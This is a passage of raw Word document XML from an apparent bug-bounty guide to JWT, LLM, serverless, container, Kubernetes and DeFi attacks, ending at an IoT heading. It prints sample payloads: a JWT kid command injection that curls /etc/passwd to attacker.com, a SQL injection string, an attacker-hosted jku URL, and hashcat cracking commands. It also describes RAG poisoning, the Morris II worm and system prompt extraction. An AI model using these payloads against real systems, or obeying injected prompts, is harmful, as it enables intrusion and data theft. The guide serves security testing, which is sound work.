    <w:p w14:paraId="2513EE43" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="08A84534" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**None algorithm attacks remove signature requirements entirely.** Implementations accepting `alg: none` in headers skip signature verification completely. jwt_tool generates four none-algorithm variants: `python3 jwt_tool.py JWT_HERE -X a`. Manual creation involves base64-encoding `{"alg":"none","typ":"JWT"}.{"sub":"admin","role":"admin"}.` with trailing periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A738C98" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7DE57F9A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**JWK header injection embeds attacker-controlled public keys** directly in tokens. The embedded `jwk` object contains RSA parameters (e,n) for the attacker's private key. Burp JWT Editor automates this via Attack→Embedded JWK after generating new RSA keys. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Manual exploitation uses Python Cryptodome to generate key pairs and construct tokens with embedded `jwk` headers containing the public key components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D35B9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5AE2E0EF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**JKU attacks point to attacker-hosted JWKS endpoints.** Attackers host malicious JWKS JSON files at controlled domains containing their public keys. Token headers include `jku: "https://attacker.com/jwks.json"` and corresponding `kid` values. Vulnerable implementations fetch and trust these external key sources, validating attacker-signed tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC0BC9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="30BD0B7E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**KID manipulation enables path traversal and injection.** Path traversal attacks use `kid: "../../dev/null"` to force verification against empty files with known secrets. SQL injection exploits databases storing keys: `kid: "key' UNION SELECT 'known_secret'--"`. Command injection leverages shell execution: `kid: "key.txt; curl attacker.com?data=$(cat /etc/passwd|base64)"`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EA2B5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3264F3F7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Weak secret brute-forcing remains effective.** Hashcat mode 16500 enables GPU-accelerated cracking: `hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt`. jwt_tool provides similar functionality: `python3 jwt_tool.py JWT_HERE -C -d rockyou.txt`. Testing should target common secrets, dictionary words, and default values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F00805" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="447097FC" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## LLM and GenAI attacks expand beyond prompt injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E83752A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0432A534" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**OWASP Top 10 for LLMs 2025** maintains prompt injection as the #1 risk while introducing system prompt leakage as a new top-tier vulnerability. Research in 2024-2025 demonstrates attacks evolving from simple prompt manipulation into sophisticated multi-stage exploitation chains targeting retrieval-augmented generation (RAG) systems, model inversion, and tool abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8604F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="449374D1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**RAG poisoning through PoisonedRAG attacks** enables knowledge corruption in retrieval-augmented generation systems. Attackers inject malicious texts into knowledge databases that RAG systems query before generating responses. Both black-box and white-box variants exist, with black-box attacks not requiring model architecture </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>knowledge. When users query topics covered by poisoned documents, models generate attacker-controlled responses, enabling disinformation, credential harvesting, or malicious redirects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F53FA7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4697DFAE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**The Morris II worm (2024) demonstrates self-replicating GenAI exploitation.** As the first worm targeting GenAI ecosystems, it uses adversarial self-replicating prompts in both text and image formats. Successfully demonstrated against GPT-4, Gemini Pro, and LLaVA, the worm achieves data exfiltration and spam propagation through autonomous replication across AI agent networks. Text-based prompts embed replication instructions within responses, while image-embedded variants use steganography or adversarial perturbations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CF346" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2DBD8ED6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Tool and function calling abuse exploits LLM agent permissions.** Modern LLMs receive function definitions for capabilities like database queries, file access, or API calls. Attackers craft prompts triggering unauthorized function invocations, privilege escalation via exposed administrative tools, or chaining multiple function calls for complex exploits. The Zenity demonstration at Black Hat 2024 showed Microsoft Copilot hijacking through indirect prompt injection in documents, enabling full remote control via RAG poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D6961" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="6F608C92" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Model inversion and data extraction attacks** recover training data through sentence embedding leakage. Embeddings used in vector databases for RAG systems can leak entire sentences when properly analyzed. Privacy implications extend to any system storing embeddings of sensitive documents. Multimodal attacks hide prompts in images affecting vision-language models, increasing detection complexity and enabling cross-modal exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDB12D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5082FA2A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**System prompt leakage (new in OWASP Top 10 2025)** exposes internal instructions and configurations through carefully crafted queries. Extracted system prompts reveal security controls, enable jailbreaking attempts, and expose business logic. CVE-2024-5184 demonstrated LLM-powered email assistant vulnerabilities allowing malicious prompt injection with unauthorized access, data exfiltration, and system compromise as consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC40FE6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3BA2C0F3" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Bug bounty hunters should target:** RAG system implementations by testing knowledge poisoning via document uploads, AI agent tool calling through permission boundary testing, prompt injection surfaces in user-facing AI features, model training pipelines for data poisoning opportunities, and multimodal input handling combining text and images. Testing methodologies include indirect injection via external content, system prompt extraction through meta-prompts, function call enumeration and abuse, and embedding extraction from vector databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0EE4F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="03534A35" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Serverless and edge computing introduce unique attack surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D529052" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5377750E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Serverless architectures present fundamentally different security models** than traditional server-based applications, with cold start exploitation, environment variable exposure, and isolation boundary testing creating new vulnerability classes. Cloudflare Workers' V8 isolates (5ms cold starts) and AWS Lambda's containerization (higher overhead) create distinct attack vectors requiring specialized techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D26DB5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2BC78781" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Cold start exploitation targets initialization phases.** Memory state manipulation during function initialization, timing attacks against cold start processes, and resource exhaustion through repeated cold starts enable unauthorized access or denial of service. Attackers enumerate Lambda function names, trigger cold starts intentionally, and measure timing differences revealing internal state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A63608" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2373A667" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Execution role permission escalation** affects Lambda deployments with overly-permissive IAM roles. Functions granted extensive AWS permissions (S3 full access, DynamoDB admin, EC2 control) become pivot points after compromise. Layer poisoning attacks inject malicious code into Lambda layers, affecting multiple functions sharing compromised layers. VPC configuration bypasses exploit misconfigured security groups or network ACLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C37A90" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3441A22E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Edge runtime vulnerabilities target Cloudflare Workers and Vercel Edge Functions.** JavaScript sandbox limitations in V8 isolates create potential escape vectors. WebAssembly integration introduces memory safety concerns. DNS over HTTPS (DoH) </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tunnel detection evasion and last mile reassembly attacks (demonstrated at DEF CON 32) enable malware delivery directly to browsers, bypassing traditional secure web gateways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F79D92" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3A64C23B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**SquareX research at DEF CON 32 revealed 25 methods** to evade Secure Web Gateway detection using WebAssembly modules. Traditional SWGs cannot inspect WASM binaries effectively, creating blind spots for malware delivery. Attackers compile malicious code to WASM format, serve via edge functions, and execute directly in browser sandboxes with SWGs unable to detect threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C2341" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="23615BF1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Secrets management failures** expose credentials in environment variables, function code, or logs. AWS Lambda runtime credentials (`/var/runtime/credentials`), configuration files (`/var/task/.env`, `/var/task/application.properties`), and cloud provider metadata endpoints become high-value targets. Testing should enumerate environment variables, read configuration files through path traversal, access metadata services (169.254.169.254), and test inter-function authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910F288" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4A353E45" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**API Gateway misconfigurations** enable unauthorized function invocations. Missing authentication on HTTP triggers, overly-permissive CORS policies, and rate limit bypasses through batch operations create exploitation opportunities. Event source mapping exploits manipulate S3 events, SQS messages, or DynamoDB streams triggering functions with attacker-controlled data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A2C85C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3AED75D2" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Container escape techniques evolved with Leaky Vessels discoveries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CDD1A1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="6CEFED3F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Snyk's January 2024 "Leaky Vessels" disclosure** revealed critical container escape vulnerabilities affecting runc, BuildKit, and Docker Desktop, with CVE-2024-21626 (CVSS 8.6) enabling full host root command execution through WORKDIR exploitation in runc ≤1.1.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D68F8" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3F60DF44" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**CVE-2024-21626 exploits order-of-operations in container spawning.** The vulnerability manipulates working directories via privileged file descriptors during container initialization. Attackers use `/proc/self/fd/` to access host directories normally restricted, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>enabling traversal to the full host filesystem. The WORKDIR command processing opens file descriptors before security restrictions fully engage, creating a race window for exploitation. Fixed in runc 1.1.12, the vulnerability affected all major container runtimes including containerd and CRI-O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02620022" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="04ABD652" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**BuildKit vulnerabilities (CVE-2024-23651, CVE-2024-23652, CVE-2024-23653)** target image building processes. CVE-2024-23651 exploits symlink race conditions in cache mount mechanisms, enabling host file access during builds (≤v0.12.4). CVE-2024-23652 manipulates temporary directory cleanup to delete arbitrary host files. CVE-2024-23653 enables container breakout during image construction, particularly dangerous in automated CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49C395" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5BE11A03" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Docker Desktop specific CVEs demonstrate extension risks.** CVE-2024-8695 (Critical RCE) exploits malicious extension descriptions or changelogs for remote code execution. CVE-2024-8696 (High RCE) targets extension publisher URL handling. Both fixed in Docker Desktop 4.34.2, but CVE-2025-9074 (2025) reveals malicious containers can access Docker Engine and launch additional containers without explicit socket mounts, even with Enhanced Container Isolation enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFCF69" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="24B4E5AF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Kubernetes cluster-wide implications** affect deployments using vulnerable containerd versions (≤1.6.27, ≤1.7.12). The CVE-2024-21626 container escape propagates across cluster nodes, requiring immediate patching of containerd 1.6.28+/1.7.13+ and associated runc versions. Cluster administrators must audit privileged containers, host path mounts, and security contexts across all namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC2BB0" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7B84D2DB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Privileged container exploitation** remains the most common escape vector. Containers running with `securityContext.privileged: true` bypass kernel security features. Capabilities like CAP_SYS_ADMIN enable mount namespace manipulation. Host path mounts to `/`, `/var/run/docker.sock`, or `/proc` provide direct host access. Testing should identify privileged pods, enumerate capabilities, check for sensitive host paths, and attempt namespace escapes through exposed sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A062F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7CEBFED4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Enhanced Container Isolation (ECI)** and Image/Registry Access Management provide partial mitigation, but fundamentally secure container deployment requires enforcing Pod Security Standards (Restricted profile), running as non-root users (runAsNonRoot: true, runAsUser: 1000), dropping all capabilities and adding only required ones, enabling read-only root filesystems, and implementing continuous vulnerability scanning in CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C0F58" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="72054E0D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Kubernetes and cloud-native security exposes critical misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50903392" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="471742C7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Wiz Research's IngressNightmare (2025)** uncovered CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974 in Ingress NGINX Controller, affecting **43% of cloud environments** with 6,500+ publicly exposed clusters and full cluster takeover potential through admission controller vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269A4DB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="09E65A3A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Kubernetes API server attacks** exploit exposed endpoints and permission boundaries. CVE-2024-9486 (High) enables unauthorized cluster operation access through request processing vulnerabilities, with privilege escalation and data integrity impacts. CVE-2024-9042 affects ALL Windows nodes with SYSTEM privilege remote code execution via Log Query beta feature command injection in pattern parameters, requiring RBAC restrictions on `/logs` endpoints. CVE-2024-10220 enables arbitrary command execution via gitRepo volumes (deprecated but exploitable) through malicious Git hooks with root privileges on host nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65200F6D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="19FCB6D2" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**RBAC misconfiguration patterns** create privilege escalation paths. Overly-permissive ClusterRoles grant cluster-wide administrative access. ServiceAccount token exposure in pods enables lateral movement. Pod creation privileges allow deploying privileged containers mounting host filesystem. Role binding manipulation escalates permissions through self-modification. CVE-2024-7646 demonstrated authentication bypass in Kubernetes control planes enabling cluster-wide compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE5130" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4D7D4912" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Admission controller bypasses** target validation and mutation webhooks. Namespaces without Pod Security Standards enforcement allow privileged pod deployment. Service accounts with excessive permissions deploy malicious webhooks. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ValidatingWebhookConfiguration with fail-open policies allow policy violations during webhook failures. OPA/Gatekeeper policy gaps create unintended permission grants. ImagePolicyWebhook bypasses enable deploying unverified container images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A691EF0" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0DD4D081" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Custom Resource Definition (CRD) attacks** introduce application-specific vulnerabilities. Malicious CRD injection creates backdoor administrative interfaces. RBAC escalation via custom resources exploits resource-type-specific permissions. Controller hijacking replaces legitimate controllers with malicious versions. Privilege escalation through CRD scope misuse grants unintended cluster-wide access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FAD3F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="63B60F32" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Network policy absence** enables unrestricted pod-to-pod communication by default. After initial compromise, attackers perform lateral movement across namespaces, pivot to sensitive services without authentication, and exfiltrate data across pod boundaries. Zero-trust segmentation with default-deny policies limits blast radius significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71CBAD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5A9F95DF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Secrets management failures** expose credentials in environment variables (readable via kubectl describe), Kubernetes Secrets without encryption at rest, or version control commits. External secret managers (Vault, AWS Secrets Manager) with proper IAM/RBAC integration provide superior protection. Testing methodology involves enumerating exposed API endpoints, attempting anonymous access (`kubectl --token="" auth can-i --list`), deploying test privileged pods, injecting malicious CRDs, and testing network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374566AD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7C80CC71" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Statistics reveal systemic problems:** 81 vulnerabilities identified in Kubernetes ecosystem in 2024 (22.7% of all-time CVEs), stable core with increasing ecosystem vulnerabilities, and 38% overall CVE increase. Red Hat 2024 research found 89% of organizations experienced Kubernetes security incidents, 65% had high-severity issues, 50% failed 14+ security controls, and 45% of incidents resulted from misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743003D5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="710FFB16" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Blockchain and Web3 protocols hemorrhage $1.4 billion in 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D206CD0" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2FFB17BE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**DeFi security landscape in 2024** saw $1.4 billion stolen across 200+ incidents with only $105 million recovered (7.43% recovery rate). Smart contract vulnerabilities remained the primary attack vector, with access control issues, price manipulation, private key compromises, and phishing attacks dominating the threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAA5FF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4F4EF689" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Largest hacks demonstrate scale:** DMM Bitcoin lost ~$300 million, WazirX $230 million, Chris Larsen's wallet $112 million, and Munchables $62.5 million. The common thread across incidents involves inadequate security testing, missing access controls, and price oracle manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354C9E0" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="06D163A1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Access control vulnerabilities** affect smart contract functions lacking proper permission checks. Unprotected initialization functions allow attackers to claim ownership. Missing modifier protections (onlyOwner, onlyAdmin) enable unauthorized state changes. Ownership transfer vulnerabilities let attackers claim administrative roles. Solidity examples include unchecked external calls returning without validation and delegate calls to untrusted contracts executing in the calling contract's context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7D561" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3DF1C56D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Price manipulation exploits oracle dependencies.** Flash loan attacks borrow massive amounts to manipulate liquidity pools temporarily, execute trades at manipulated prices, and repay loans within single transactions. Sandwich attacks front-run legitimate transactions with buy orders, let victim transaction execute at inflated price, then immediately sell at profit. Liquidity pool manipulation alters trading pairs' balances affecting price calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FC29B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="6649B69B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Smart contract specific vulnerabilities** include reentrancy attacks (classic Ethereum vulnerability pattern), integer overflow/underflow in older Solidity versions, logic errors in DeFi protocol mathematics, unprotected callbacks enabling state manipulation, tx.origin authentication (forgeable through proxies), and block timestamp dependence for randomness or time-locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF53B7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5C6B738A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Wallet integration bugs** expose user assets through transaction signing bypasses, network switching attacks redirecting to malicious chains, malicious dApp connections </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>requesting excessive permissions, gas manipulation hiding malicious operations, and WalletConnect session hijacking via QR code phishing or man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C49BB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="20E5412F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Bug bounty opportunities focus on Immunefi** ($162M+ available bounties, $110M+ paid historically) with largest payouts including Wormhole ($10M to satya0x), Aurora ($6M to pwning.eth), Polygon ($2.2M to Leon Spacewalker), and Optimism ($2M to Saurik). HackenProof focuses on blockchain protocols, smart contract auditing, and Cronos ecosystem coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16026F09" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="766A6044" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Testing methodology requires:** Examining smart contract source code for access control, reentrancy, and integer issues; testing price oracle manipulation via flash loans and liquidity manipulation; analyzing wallet integration for signature bypasses and transaction manipulation; checking cross-chain bridge implementations for lock/unlock vulnerabilities; and reviewing governance mechanisms for voting manipulation and proposal injection. Tools include Slither (static analysis), Mythril (symbolic execution), Echidna (fuzzing), and Manticore (dynamic analysis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC1327" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0677A227" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## IoT and OT devices expose critical infrastructure through default credentials</w:t>
